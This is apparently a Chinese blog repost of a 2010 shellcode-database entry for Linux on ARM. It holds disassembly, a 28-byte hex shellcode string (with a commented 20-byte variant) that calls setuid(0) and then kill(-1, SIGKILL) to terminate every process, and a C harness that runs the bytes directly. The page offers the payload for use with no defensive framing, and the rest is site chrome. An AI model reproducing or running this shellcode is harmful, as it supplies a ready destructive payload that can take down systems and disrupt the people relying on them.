arm linux漏洞,Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes

于 2021-05-13 23:13:59 发布
阅读量93 收藏
点赞数
文章标签: arm linux漏洞

/*

Title: Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes

(Kill all processes)

Date: 2010-06-29

Tested: ARM926EJ-S rev 5 (v5l)

Author: Jonathan Salwan

Web: http://shell-storm.org | http://twitter.com/jonathansalwan

! Dtabase of shellcodes http://www.shell-storm.org/shellcode/

8054:e28f3001 addr3, pc, #1 ; 0x1

8058:e12fff13 bxr3

805c:1b24 subsr4, r4, r4

805e:1c20 addsr0, r4, #0

8060:2717 movsr7, #23

8062:df01 svc1

8064:1a92 subsr2, r2, r2

8066:1c10 addsr0, r2, #0

8068:3801 subsr0, #1

806a:2109 movsr1, #9

806c:2725 movsr7, #37

806e:df01 svc1

*/

#include <stdio.h>

/* kill all processes without setuid(0) - 20 bytes */

// char *SC = "\x01\x30\x8f\xe2"

// "\x13\xff\x2f\xe1"

// "\x92\x1a\x10\x1c"

// "\x01\x38\x09\x21"

// "\x25\x27\x01\xdf";

/* kill all processes with setuid(0) - 28 byes */

char *SC = "\x01\x30\x8f\xe2"

"\x13\xff\x2f\xe1"

"\x24\x1b\x20\x1c"

"\x17\x27\x01\xdf"

"\x92\x1a\x10\x1c"

"\x01\x38\x09\x21"

"\x25\x27\x01\xdf";

int main(void)

{

fprintf(stdout,"Length: %d\n",strlen(SC));

(*(void(*)()) SC)();

return 0;

}

刘芮希
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值